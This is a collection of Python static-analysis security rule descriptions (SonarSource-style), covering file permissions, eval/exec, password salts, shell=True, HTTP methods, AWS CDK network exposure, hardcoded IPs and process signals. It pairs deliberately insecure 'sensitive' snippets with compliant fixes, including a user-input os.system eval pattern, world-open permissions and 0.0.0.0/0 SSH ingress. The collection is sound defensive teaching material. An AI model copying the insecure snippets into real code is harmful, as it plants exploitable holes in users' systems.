Temporary files can be created using unsafe functions and APIs as long as strong security controls are applied. Non-temporary file-handling functions and APIs can also be used for that purpose.

In general, applications should ensure that attackers cannot create a file before them. This translates into the following requirements when creating the files:

  • Files should be created in a non-public directory.
  • File names should be unique.
  • File names should be unpredictable. They should be generated using a cryptographically secure random generator.
  • File creation should fail if a target file already exists.

Moreover, when possible, it is recommended that applications destroy temporary files after they have finished using them.
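The requirements above can be combined into a manual creation sketch (illustrative only; secure APIs such as tempfile.NamedTemporaryFile remain preferable, and the helper name here is hypothetical):

```python
import os
import secrets
import tempfile

def create_private_file(directory=None):
    """Create a file with an unpredictable name, owner-only permissions,
    and a creation call that fails if the target already exists (O_EXCL)."""
    directory = directory or tempfile.gettempdir()
    name = secrets.token_hex(16)  # cryptographically secure random name
    path = os.path.join(directory, name)
    fd = os.open(path, os.O_CREAT | os.O_EXCL | os.O_WRONLY, 0o600)
    return fd, path
```

Because of the O_EXCL flag, a second creation attempt on the same path raises FileExistsError instead of silently reusing an attacker-planted file.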

Resources

Documentation

Standards

  • OWASP - Top 10 2021 - A01:2021 - Broken Access Control
  • OWASP - Top 10 2017 - A9:2017 - Using Components with Known Vulnerabilities
  • MITRE - CWE-377: Insecure Temporary File
  • MITRE - CWE-379: Creation of Temporary File in Directory with Incorrect Permissions
python:S2612

In Unix file system permissions, the "others" category refers to all users except the owner of the file system resource and the members of the group assigned to this resource.

Granting permissions to this category can lead to unintended access to files or directories that could allow attackers to obtain sensitive information, disrupt services or elevate privileges.

Ask Yourself Whether

  • The application is designed to be run on a multi-user environment.
  • Corresponding files and directories may contain confidential information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The most restrictive possible permissions should be assigned to files and directories.

Sensitive Code Example

For os.umask:

os.umask(0)  # Sensitive

For os.chmod, os.lchmod, and os.fchmod:

os.chmod("/tmp/fs", stat.S_IRWXO)   # Sensitive
os.lchmod("/tmp/fs", stat.S_IRWXO)  # Sensitive
os.fchmod(fd, stat.S_IRWXO)         # Sensitive

Compliant Solution

For os.umask:

os.umask(0o777)

For os.chmod, os.lchmod, and os.fchmod:

os.chmod("/tmp/fs", stat.S_IRWXU)
os.lchmod("/tmp/fs", stat.S_IRWXU)
os.fchmod(fd, stat.S_IRWXU)
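To sketch how the absence of "others" permissions can be verified at runtime (a minimal POSIX-only illustration, not part of the rule itself):

```python
import os
import stat
import tempfile

fd, path = tempfile.mkstemp()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)  # 0o600: owner read/write only
mode = stat.S_IMODE(os.stat(path).st_mode)
others = mode & stat.S_IRWXO  # 0 means no permissions for "others"
os.close(fd)
os.remove(path)
```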

See

python:S1523

This rule is deprecated, and will eventually be removed.

Executing code dynamically is security-sensitive. It has led in the past to the following vulnerabilities:

Some APIs enable the execution of dynamic code by providing it as strings at runtime. These APIs might be useful in some very specific meta-programming use-cases. However most of the time their use is frowned upon because they also increase the risk of maliciously Injected Code. Such attacks can either run on the server or in the client (example: XSS attack) and have a huge impact on an application’s security.

This rule marks for review each occurrence of such dynamic code execution. This rule does not detect code injections. It only highlights the use of APIs which should be used sparingly and very carefully.

Ask Yourself Whether

  • the executed code may come from an untrusted source and hasn’t been sanitized.
  • you really need to run code dynamically.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Regarding the execution of unknown code, the best solution is to not run code provided by an untrusted source. If you really need to do it, run the code in a sandboxed environment. Use jails, firewalls and whatever means your operating system and programming language provide (examples: Security Managers in Java, iframes and the same-origin policy for JavaScript in a web browser).

Do not try to create a blacklist of dangerous code. It is impossible to cover all attacks that way.

Avoid using dynamic code APIs whenever possible. Hard-coded code is always safer.
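When the dynamic behavior amounts to choosing among known operations, a dispatch table of hard-coded functions removes the need for eval/exec entirely, and ast.literal_eval covers the common case of parsing literal values (a sketch; the operation names are hypothetical):

```python
import ast

# Map user-supplied names to hard-coded functions instead of eval-ing code.
OPERATIONS = {
    "upper": str.upper,
    "lower": str.lower,
}

def run_operation(name, text):
    if name not in OPERATIONS:
        raise ValueError(f"unsupported operation: {name}")
    return OPERATIONS[name](text)

# ast.literal_eval parses Python literals without executing any code.
parsed = ast.literal_eval("[1, 2, 3]")
```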

Sensitive Code Example

import os

value = input()
command = 'os.system("%s")' % value

def evaluate(command, file, mode):
    eval(command)  # Sensitive.

eval(command)  # Sensitive. Dynamic code

def execute(code, file, mode):
    exec(code)  # Sensitive.
    exec(compile(code, file, mode))  # Sensitive.

exec(command)  # Sensitive.

See

python:S2053

This vulnerability increases the likelihood that attackers are able to compute the cleartext of password hashes.

Why is this an issue?

During the process of password hashing, an additional component, known as a "salt," is often integrated to bolster the overall security. This salt, acting as a defensive measure, primarily wards off certain types of attacks that leverage pre-computed tables to crack passwords.

However, potential risks emerge when the salt is deemed insecure. This can occur when the salt is consistently the same across all users or when it is too short or predictable. In scenarios where users share the same password and salt, their password hashes will inevitably mirror each other. Similarly, a short salt heightens the probability of multiple users unintentionally having identical salts, which can potentially lead to identical password hashes. These identical hashes streamline the process for potential attackers to recover clear-text passwords. Thus, the emphasis on implementing secure, unique, and sufficiently lengthy salts in password-hashing functions is vital.

What is the potential impact?

Despite best efforts, even well-guarded systems might have vulnerabilities that could allow an attacker to gain access to the hashed passwords. This could be due to software vulnerabilities, insider threats, or even successful phishing attempts that give attackers the access they need.

Once the attacker has these hashes, they will likely attempt to crack them using a couple of methods. One is brute force, which entails trying every possible combination until the correct password is found. While this can be time-consuming, having the same salt for all users or a short salt can make the task significantly easier and faster.

If multiple users have the same password and the same salt, their password hashes would be identical. This means that if an attacker successfully cracks one hash, they have effectively cracked all identical ones, granting them access to multiple accounts at once.

A short salt, while less critical than a shared one, still increases the odds of different users having the same salt. This might create clusters of password hashes with identical salt that can then be attacked as explained before.

With short salts, the probability of a collision between two users' passwords and salts couple might be low depending on the salt size. The shorter the salt, the higher the collision probability. In any case, using longer, cryptographically secure salt should be preferred.

How to fix it in Python Standard Library

Code examples

The following code contains examples of hard-coded salts.

Noncompliant code example

import crypt

hash = crypt.crypt(password) # Noncompliant

Compliant solution

import crypt

salt = crypt.mksalt(crypt.METHOD_SHA256)
hash = crypt.crypt(password, salt)

How does this work?

This code ensures that each user’s password has a unique salt value associated with it. It generates a salt randomly and with a length that provides the required security level. It uses a salt length of at least 16 bytes (128 bits), as recommended by industry standards.

Here, the compliant code example ensures the salt is random and has a sufficient length by calling the crypt.mksalt function. This one internally uses a cryptographically secure pseudo random number generator.
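For code that cannot use crypt (it is Unix-only and deprecated since Python 3.11), the same properties — a random, unique, 16-byte salt per user — can be obtained with hashlib (a sketch; the iteration count is an assumption to tune for your hardware):

```python
import hashlib
import hmac
import os

def hash_password(password: str) -> tuple[bytes, bytes]:
    salt = os.urandom(16)  # 16 bytes (128 bits), unique per call/user
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)
    return salt, digest

def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)
    return hmac.compare_digest(candidate, digest)  # constant-time comparison
```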

Resources

Standards

  • OWASP Top 10:2021 A02:2021 - Cryptographic Failures
  • OWASP - Top 10 2017 - A03:2017 - Sensitive Data Exposure
  • CWE - CWE-759: Use of a One-Way Hash without a Salt
  • CWE - CWE-760: Use of a One-Way Hash with a Predictable Salt
python:S4721

This rule is deprecated, and will eventually be removed.

Arbitrary OS command injection vulnerabilities are more likely when a shell is spawned rather than a new process, because shell meta-characters can then be used (for instance, when parameters are user-controlled) to inject OS commands.

Ask Yourself Whether

  • OS command name or parameters are user-controlled.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Use functions that don’t spawn a shell.

Sensitive Code Example

Python 3

subprocess.run(cmd, shell=True)  # Sensitive
subprocess.Popen(cmd, shell=True)  # Sensitive
subprocess.call(cmd, shell=True)  # Sensitive
subprocess.check_call(cmd, shell=True)  # Sensitive
subprocess.check_output(cmd, shell=True)  # Sensitive
os.system(cmd)  # Sensitive: a shell is always spawned

Python 2

cmd = "when a string is passed to these functions, a shell is spawned"
(_, child_stdout) = os.popen2(cmd)  # Sensitive
(_, child_stdout, _) = os.popen3(cmd)  # Sensitive
(_, child_stdout) = os.popen4(cmd)  # Sensitive


(child_stdout, _) = popen2.popen2(cmd)  # Sensitive
(child_stdout, _, _) = popen2.popen3(cmd)  # Sensitive
(child_stdout, _) = popen2.popen4(cmd)  # Sensitive

Compliant Solution

Python 3

# by default shell=False, so a shell is not spawned
subprocess.run(cmd)  # Compliant
subprocess.Popen(cmd)  # Compliant
subprocess.call(cmd)  # Compliant
subprocess.check_call(cmd)  # Compliant
subprocess.check_output(cmd)  # Compliant

# always in a subprocess:
os.spawnl(mode, path, *cmd)  # Compliant
os.spawnle(mode, path, *cmd, env)  # Compliant
os.spawnlp(mode, file, *cmd)  # Compliant
os.spawnlpe(mode, file, *cmd, env)  # Compliant
os.spawnv(mode, path, cmd)  # Compliant
os.spawnve(mode, path, cmd, env)  # Compliant
os.spawnvp(mode, file, cmd)  # Compliant
os.spawnvpe(mode, file, cmd, env)  # Compliant

(child_stdout) = os.popen(cmd, mode, 1)  # Compliant
(_, output) = subprocess.getstatusoutput(cmd)  # Compliant
out = subprocess.getoutput(cmd)  # Compliant
os.startfile(path)  # Compliant
os.execl(path, *cmd)  # Compliant
os.execle(path, *cmd, env)  # Compliant
os.execlp(file, *cmd)  # Compliant
os.execlpe(file, *cmd, env)  # Compliant
os.execv(path, cmd)  # Compliant
os.execve(path, cmd, env)  # Compliant
os.execvp(file, cmd)  # Compliant
os.execvpe(file, cmd, env)  # Compliant

Python 2

cmdsargs = ("use", "a", "sequence", "to", "directly", "start", "a", "subprocess")

(_, child_stdout) = os.popen2(cmdsargs)  # Compliant
(_, child_stdout, _) = os.popen3(cmdsargs)  # Compliant
(_, child_stdout) = os.popen4(cmdsargs)  # Compliant

(child_stdout, _) = popen2.popen2(cmdsargs)  # Compliant
(child_stdout, _, _) = popen2.popen3(cmdsargs)  # Compliant
(child_stdout, _) = popen2.popen4(cmdsargs)  # Compliant
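The safe pattern above — passing an argument list with shell=False — can be exercised end-to-end; metacharacters in user input arrive as literal text because no shell interprets them (a sketch; sys.executable stands in for an arbitrary program):

```python
import subprocess
import sys

user_input = "hello; rm -rf /"  # would be dangerous if a shell parsed it
# shell=False (the default) passes arguments directly to the new process,
# so the semicolon is just data, not a command separator.
result = subprocess.run(
    [sys.executable, "-c", "import sys; print(sys.argv[1])", user_input],
    capture_output=True,
    text=True,
)
```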

See

python:S3752

An HTTP method is safe when used to perform a read-only operation, such as retrieving information. In contrast, an unsafe HTTP method is used to change the state of an application, for instance to update a user’s profile on a web application.

Common safe HTTP methods are GET, HEAD, or OPTIONS.

Common unsafe HTTP methods are POST, PUT and DELETE.

Allowing both safe and unsafe HTTP methods to perform a specific operation on a web application can impact its security; for example, CSRF protections usually only cover operations performed by unsafe HTTP methods.

Ask Yourself Whether

  • HTTP methods are not defined at all for a route/controller of the application.
  • Safe HTTP methods are defined and used for a route/controller that can change the state of an application.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

For all the routes/controllers of an application, the authorized HTTP methods should be explicitly defined and safe HTTP methods should only be used to perform read-only operations.

Sensitive Code Example

For Django:

# No method restriction
def view(request):  # Sensitive
    return HttpResponse("...")
@require_http_methods(["GET", "POST"])  # Sensitive
def view(request):
    return HttpResponse("...")

For Flask:

@methods.route('/sensitive', methods=['GET', 'POST'])  # Sensitive
def view():
    return Response("...", 200)

Compliant Solution

For Django:

@require_http_methods(["POST"])
def view(request):
    return HttpResponse("...")
@require_POST
def view(request):
    return HttpResponse("...")
@require_GET
def view(request):
    return HttpResponse("...")
@require_safe
def view(request):
    return HttpResponse("...")

For Flask:

@methods.route('/compliant1')
def view():
    return Response("...", 200)
@methods.route('/compliant2', methods=['GET'])
def view():
    return Response("...", 200)

See

python:S6463

Allowing unrestricted outbound communications can lead to data leaks.

A restrictive security group is an additional layer of protection that might prevent the abuse or exploitation of a resource. For example, it complicates the exfiltration of data in the case of a successfully exploited vulnerability.

When deciding if outgoing connections should be limited, consider that limiting the connections results in additional administration and maintenance work.

Ask Yourself Whether

  • The resource has access to sensitive data.
  • The resource is part of a private network.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to restrict outgoing connections to a set of trusted destinations.

Sensitive Code Example

For aws_cdk.aws_ec2.SecurityGroup:

from aws_cdk import (
    aws_ec2 as ec2
)

ec2.SecurityGroup(  # Sensitive; allow_all_outbound is enabled by default
    self,
    "example",
    vpc=vpc
)

Compliant Solution

For aws_cdk.aws_ec2.SecurityGroup:

from aws_cdk import (
    aws_ec2 as ec2
)

sg = ec2.SecurityGroup(
    self,
    "example",
    vpc=vpc,
    allow_all_outbound=False
)

sg.add_egress_rule(
    peer=ec2.Peer.ipv4("203.0.113.127/32"),
    connection=ec2.Port.tcp(443)
)

See

python:S6327

Amazon Simple Notification Service (SNS) is a managed messaging service for application-to-application (A2A) and application-to-person (A2P) communication. SNS topics allow publisher systems to fan out messages to a large number of subscriber systems. Amazon SNS can encrypt messages as soon as they are received, so that adversaries who gain physical access to the storage medium or otherwise leak a message are not able to access the data.

Ask Yourself Whether

  • The topic contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SNS topics that contain sensitive information. Encryption and decryption are handled transparently by SNS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_cdk.aws_sns.Topic:

from aws_cdk import (
    aws_sns as sns
)

class TopicStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        sns.Topic( # Sensitive, unencrypted by default
            self,
            "example"
        )

For aws_cdk.aws_sns.CfnTopic:

from aws_cdk import (
    aws_sns as sns
)

class TopicStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        sns.CfnTopic( # Sensitive, unencrypted by default
            self,
            "example"
        )

Compliant Solution

For aws_cdk.aws_sns.Topic:

from aws_cdk import (
    aws_sns as sns,
    aws_kms as kms
)

class TopicStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        my_key = kms.Key(self, "key")
        sns.Topic(
            self,
            "example",
            master_key=my_key
        )

For aws_cdk.aws_sns.CfnTopic:

from aws_cdk import (
    aws_sns as sns,
    aws_kms as kms
)

class TopicStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        my_key = kms.Key(self, "key")
        sns.CfnTopic(
            self,
            "example",
            kms_master_key_id=my_key.key_id
        )

See

python:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operations team change a configuration file.
  • It misleads developers into using the same address in every environment (dev, sys, qa, prod).

Last but not least, it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks are always possible, but in the case of a hardcoded IP address, solving the issue will take more time, which increases an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code; instead, make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentiality is not required, a domain name can be used, since it allows the destination to be changed quickly without rebuilding the software.

Sensitive Code Example

ip = '192.168.12.42'
sock = socket.socket()
sock.bind((ip, 9090))

Compliant Solution

ip = config.get(section, 'ipAddress')
sock = socket.socket()
sock.bind((ip, 9090))
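An environment-variable variant of the same idea (a sketch; the variable names are hypothetical, and port 0 lets the OS pick an ephemeral port for the demo):

```python
import os
import socket

# Read the bind address from the environment instead of hard-coding it.
ip = os.environ.get("APP_BIND_ADDR", "127.0.0.1")
port = int(os.environ.get("APP_BIND_PORT", "0"))  # 0 = OS-assigned port
sock = socket.socket()
sock.bind((ip, port))
```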

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849
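The exception ranges above can be checked programmatically with the standard ipaddress module (a sketch mirroring the list, not the analyzer’s actual implementation):

```python
import ipaddress

DOCUMENTATION_RANGES = [
    ipaddress.ip_network("192.0.2.0/24"),     # RFC 5737
    ipaddress.ip_network("198.51.100.0/24"),  # RFC 5737
    ipaddress.ip_network("203.0.113.0/24"),   # RFC 5737
    ipaddress.ip_network("2001:db8::/32"),    # RFC 3849
]

def is_exempt(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return (
        ip.is_loopback                        # 127.0.0.0/8
        or ip.is_unspecified                  # 0.0.0.0
        or str(ip) == "255.255.255.255"       # broadcast
        or any(ip in net for net in DOCUMENTATION_RANGES)
    )
```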

See

python:S6329

Enabling public network access to cloud resources can affect an organization’s ability to protect its data or internal operations from data theft or disruption.

Depending on the component, inbound access from the Internet can be enabled via:

  • a boolean value that explicitly allows access to the public network.
  • the assignment of a public IP address.
  • database firewall rules that allow public IP ranges.

Deciding to allow public access may happen for various reasons such as for quick maintenance, time saving, or by accident.

This decision increases the likelihood of attacks on the organization, such as:

  • data breaches.
  • intrusions into the infrastructure to permanently steal from it.
  • and various malicious traffic, such as DDoS attacks.

Ask Yourself Whether

This cloud resource:

  • should be publicly accessible to any Internet user.
  • requires inbound traffic from the Internet to function properly.

There is a risk if you answered no to any of those questions.

Recommended Secure Coding Practices

Avoid publishing cloud services on the Internet unless they are intended to be publicly accessible, such as customer portals or e-commerce sites.

Use private networks (and associated private IP addresses) and VPC peering or other secure communication tunnels to communicate with other cloud components.

The goal is to prevent the component from intercepting traffic coming in via the public IP address. If the cloud resource cannot be deployed without a public IP address, keep the address but do not create listeners for it.

Sensitive Code Example

For aws_cdk.aws_ec2.Instance and similar constructs:

from aws_cdk import aws_ec2 as ec2

ec2.Instance(
    self,
    "vpc_subnet_public",
    instance_type=nano_t2,
    machine_image=ec2.MachineImage.latest_amazon_linux(),
    vpc=vpc,
    vpc_subnets=ec2.SubnetSelection(subnet_type=ec2.SubnetType.PUBLIC) # Sensitive
)

For aws_cdk.aws_ec2.CfnInstance:

from aws_cdk import aws_ec2 as ec2

ec2.CfnInstance(
    self,
    "cfn_public_exposed",
    instance_type="t2.micro",
    image_id="ami-0ea0f26a6d50850c5",
    network_interfaces=[
        ec2.CfnInstance.NetworkInterfaceProperty(
            device_index="0",
            associate_public_ip_address=True, # Sensitive
            delete_on_termination=True,
            subnet_id=vpc.select_subnets(subnet_type=ec2.SubnetType.PUBLIC).subnet_ids[0]
        )
    ]
)

For aws_cdk.aws_dms.CfnReplicationInstance:

from aws_cdk import aws_dms as dms

rep_instance = dms.CfnReplicationInstance(
    self,
    "explicit_public",
    replication_instance_class="dms.t2.micro",
    allocated_storage=5,
    publicly_accessible=True, # Sensitive
    replication_subnet_group_identifier=subnet_group.replication_subnet_group_identifier,
    vpc_security_group_ids=[vpc.vpc_default_security_group]
)

For aws_cdk.aws_rds.CfnDBInstance:

from aws_cdk import aws_rds as rds
from aws_cdk import aws_ec2 as ec2

rds_subnet_group_public = rds.CfnDBSubnetGroup(
    self,
    "public_subnet",
    db_subnet_group_description="Subnets",
    subnet_ids=vpc.select_subnets(
        subnet_type=ec2.SubnetType.PUBLIC
    ).subnet_ids
)

rds.CfnDBInstance(
    self,
    "public-public-subnet",
    engine="postgres",
    master_username="foobar",
    master_user_password="12345678",
    db_instance_class="db.r5.large",
    allocated_storage="200",
    iops=1000,
    db_subnet_group_name=rds_subnet_group_public.ref,
    publicly_accessible=True, # Sensitive
    vpc_security_groups=[sg.security_group_id]
)

Compliant Solution

For aws_cdk.aws_ec2.Instance:

from aws_cdk import aws_ec2 as ec2

ec2.Instance(
    self,
    "vpc_subnet_private",
    instance_type=nano_t2,
    machine_image=ec2.MachineImage.latest_amazon_linux(),
    vpc=vpc,
    vpc_subnets=ec2.SubnetSelection(subnet_type=ec2.SubnetType.PRIVATE_WITH_NAT)
)

For aws_cdk.aws_ec2.CfnInstance:

from aws_cdk import aws_ec2 as ec2

ec2.CfnInstance(
    self,
    "cfn_private",
    instance_type="t2.micro",
    image_id="ami-0ea0f26a6d50850c5",
    network_interfaces=[
        ec2.CfnInstance.NetworkInterfaceProperty(
            device_index="0",
            associate_public_ip_address=False, # Compliant
            delete_on_termination=True,
            subnet_id=vpc.select_subnets(subnet_type=ec2.SubnetType.PRIVATE_WITH_NAT).subnet_ids[0]
        )
    ]
)

For aws_cdk.aws_dms.CfnReplicationInstance:

from aws_cdk import aws_dms as dms

rep_instance = dms.CfnReplicationInstance(
    self,
    "explicit_private",
    replication_instance_class="dms.t2.micro",
    allocated_storage=5,
    publicly_accessible=False,
    replication_subnet_group_identifier=subnet_group.replication_subnet_group_identifier,
    vpc_security_group_ids=[vpc.vpc_default_security_group]
)

For aws_cdk.aws_rds.CfnDBInstance:

from aws_cdk import aws_rds as rds
from aws_cdk import aws_ec2 as ec2

rds_subnet_group_private = rds.CfnDBSubnetGroup(
    self,
    "private_subnet",
    db_subnet_group_description="Subnets",
    subnet_ids=vpc.select_subnets(
        subnet_type=ec2.SubnetType.PRIVATE_WITH_NAT
    ).subnet_ids
)

rds.CfnDBInstance(
    self,
    "private-private-subnet",
    engine="postgres",
    master_username="foobar",
    master_user_password="12345678",
    db_instance_class="db.r5.large",
    allocated_storage="200",
    iops=1000,
    db_subnet_group_name=rds_subnet_group_private.ref,
    publicly_accessible=False,
    vpc_security_groups=[sg.security_group_id]
)

See

python:S4828

Signaling processes or process groups can seriously affect the stability of this application or other applications on the same system.

Accidentally setting an incorrect PID or signal or allowing untrusted sources to assign arbitrary values to these parameters may result in a denial of service.

Also, the system treats the signal differently if the destination PID is less than or equal to 0. This different behavior may affect multiple processes with the same (E)UID simultaneously if the call is left uncontrolled.

Ask Yourself Whether

  • The parameters pid and sig are untrusted (they come from an external source).
  • This function is triggered by non-administrators.
  • Signal handlers on the target processes stop important functions.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • For stateful applications with user management, ensure that only administrators trigger this code.
  • Verify that the pid and sig parameters are correct before using them.
  • Ensure that the process sending the signals runs with as few OS privileges as possible.
  • Isolate the process on the system based on its (E)UID.
  • Ensure that the signal does not interrupt any essential functions when intercepted by a target’s signal handlers.

Sensitive Code Example

import os

@app.route("/kill-pid/<pid>")
def send_signal(pid):
    os.kill(pid, 9)  # Sensitive

@app.route("/kill-pgid/<pgid>")
def send_signal_pg(pgid):
    os.killpg(pgid, 9)  # Sensitive

Compliant Solution

import os

@app.route("/kill-pid/<pid>")
def send_signal(pid):
    # Validate the untrusted PID
    # with a pre-approved list or authorization checks
    if is_valid_pid(pid):
        os.kill(pid, 9)

@app.route("/kill-pgid/<pgid>")
def send_signal_pg(pgid):
    # Validate the untrusted PGID
    # with a pre-approved list or authorization checks
    if is_valid_pgid(pgid):
        os.killpg(pgid, 9)
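The validation helpers are left abstract above; a minimal sketch of a pre-approved-list check (the helper name and PIDs are illustrative) could look like:

```python
# PIDs the application is allowed to signal, loaded from trusted configuration.
APPROVED_PIDS = {4242, 4243}

def is_valid_pid(pid: str) -> bool:
    # Accept only purely numeric input that maps to a pre-approved PID.
    return pid.isdigit() and int(pid) in APPROVED_PIDS
```

A real implementation would also verify the caller's authorization before sending any signal.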

See

python:S4829

This rule is deprecated, and will eventually be removed.

Reading standard input is security-sensitive and has led to vulnerabilities in the past.

It is common for attackers to craft inputs enabling them to exploit software vulnerabilities. Thus any data read from the standard input (stdin) can be dangerous and should be validated.

This rule flags code that reads from the standard input.

Ask Yourself Whether

  • data read from the standard input is not sanitized before being used.

You are at risk if you answered yes to this question.

Recommended Secure Coding Practices

Sanitize all data read from the standard input before using it.

Sensitive Code Example

Python 2 and Python 3

import sys
from sys import stdin, __stdin__

# Any reference to sys.stdin or sys.__stdin__ without a method call is Sensitive
sys.stdin  # Sensitive

for line in sys.stdin:  # Sensitive
    print(line)

it = iter(sys.stdin)  # Sensitive
line = next(it)

# Calling the following methods on stdin or __stdin__ is sensitive
sys.stdin.read()  # Sensitive
sys.stdin.readline()  # Sensitive
sys.stdin.readlines()  # Sensitive

# Calling other methods on stdin or __stdin__ does not require a review, thus it is not Sensitive
sys.stdin.seekable()  # Ok
# ...

Python 2 only

raw_input('What is your password?')  # Sensitive

Python 3 only

input('What is your password?')  # Sensitive

Function fileinput.input and class fileinput.FileInput read the standard input when the list of files is empty.

for line in fileinput.input():  # Sensitive
    print(line)

for line in fileinput.FileInput():  # Sensitive
    print(line)

for line in fileinput.input(['setup.py']):  # Ok
    print(line)

for line in fileinput.FileInput(['setup.py']):  # Ok
    print(line)

See

python:S4823

This rule is deprecated, and will eventually be removed.

Using command line arguments is security-sensitive and has led to vulnerabilities in the past.

Command line arguments can be dangerous just like any other user input. They should never be used without being first validated and sanitized.

Remember also that any user can retrieve the list of processes running on a system, along with the arguments they were started with. Passing sensitive information via command line arguments should therefore be considered insecure.

This rule raises an issue on every reference to sys.argv and on every call to optparse.OptionParser() or argparse.ArgumentParser(). The goal is to guide security code reviews.

Ask Yourself Whether

  • any of the command line arguments are used without being sanitized first.
  • your application accepts sensitive information via command line arguments.

If you answered yes to any of these questions you are at risk.

Recommended Secure Coding Practices

Sanitize all command line arguments before using them.

Any user or application can list running processes and see the command line arguments they were started with. There are safer ways of providing sensitive information to an application than exposing it on the command line: it is common to write it to the process's standard input, or to pass the path to a file containing the information.
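As a sketch of the standard-input alternative (the helper name is illustrative):

```python
import io
import sys

def read_secret(stream=None) -> str:
    # Read the secret from a stream (stdin by default) so it never
    # appears next to the command line in the process list.
    stream = stream if stream is not None else sys.stdin
    return stream.readline().rstrip("\n")

# An operator would pipe or type the secret instead of passing it as an
# argument, e.g.:  echo "$SECRET" | myapp
```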

See

python:S6321

Why is this an issue?

Cloud platforms such as AWS, Azure, or GCP support virtual firewalls that can be used to restrict access to services by controlling inbound and outbound traffic.
Any firewall rule allowing traffic from all IP addresses to standard network ports on which administration services traditionally listen, such as 22 for SSH, can expose these services to exploits and unauthorized access.

What is the potential impact?

Like any other service, administration services can contain vulnerabilities. Administration services run with elevated privileges and thus a vulnerability could have a high impact on the system.

Additionally, credentials might be leaked through phishing or similar techniques. Attackers who are able to reach the services could use the credentials to log in to the system.

How to fix it

It is recommended to restrict access to remote administration services to only trusted IP addresses. In practice, trusted IP addresses are those held by system administrators or those of bastion-like servers.

Code examples

Noncompliant code example

For aws_cdk.aws_ec2.Instance and other constructs that support a connections attribute:

from aws_cdk import aws_ec2 as ec2

instance = ec2.Instance(
    self,
    "my_instance",
    instance_type=nano_t2,
    machine_image=ec2.MachineImage.latest_amazon_linux(),
    vpc=vpc
)

instance.connections.allow_from(
    ec2.Peer.any_ipv4(), # Noncompliant
    ec2.Port.tcp(22),
    description="Allows SSH from all IPv4"
)
instance.connections.allow_from_any_ipv4( # Noncompliant
    ec2.Port.tcp(3389),
    description="Allows Terminal Server from all IPv4"
)

For aws_cdk.aws_ec2.SecurityGroup:

from aws_cdk import aws_ec2 as ec2
security_group = ec2.SecurityGroup(
    self,
    "custom-security-group",
    vpc=vpc
)

security_group.add_ingress_rule(
    ec2.Peer.any_ipv4(), # Noncompliant
    ec2.Port.tcp_range(1, 1024)
)

For aws_cdk.aws_ec2.CfnSecurityGroup:

from aws_cdk import aws_ec2 as ec2

ec2.CfnSecurityGroup(
    self,
    "cfn-based-security-group",
    group_description="cfn based security group",
    group_name="cfn-based-security-group",
    vpc_id=vpc.vpc_id,
    security_group_ingress=[
        ec2.CfnSecurityGroup.IngressProperty( # Noncompliant
            ip_protocol="6",
            cidr_ip="0.0.0.0/0",
            from_port=22,
            to_port=22
        ),
        ec2.CfnSecurityGroup.IngressProperty( # Noncompliant
            ip_protocol="tcp",
            cidr_ip="0.0.0.0/0",
            from_port=3389,
            to_port=3389
        ),
        { # Noncompliant
            "ipProtocol":"-1",
            "cidrIpv6":"::/0"
        }
    ]
)

For aws_cdk.aws_ec2.CfnSecurityGroupIngress:

from aws_cdk import aws_ec2 as ec2

ec2.CfnSecurityGroupIngress( # Noncompliant
    self,
    "ingress-all-ip-tcp-ssh",
    ip_protocol="tcp",
    cidr_ip="0.0.0.0/0",
    from_port=22,
    to_port=22,
    group_id=security_group.attr_group_id
)

ec2.CfnSecurityGroupIngress( # Noncompliant
    self,
    "ingress-all-ipv6-all-tcp",
    ip_protocol="-1",
    cidr_ipv6="::/0",
    group_id=security_group.attr_group_id
)

Compliant solution

For aws_cdk.aws_ec2.Instance and other constructs that support a connections attribute:

from aws_cdk import aws_ec2 as ec2

instance = ec2.Instance(
    self,
    "my_instance",
    instance_type=nano_t2,
    machine_image=ec2.MachineImage.latest_amazon_linux(),
    vpc=vpc
)

instance.connections.allow_from_any_ipv4(
    ec2.Port.tcp(1234),
    description="Allows 1234 from all IPv4"
)

instance.connections.allow_from(
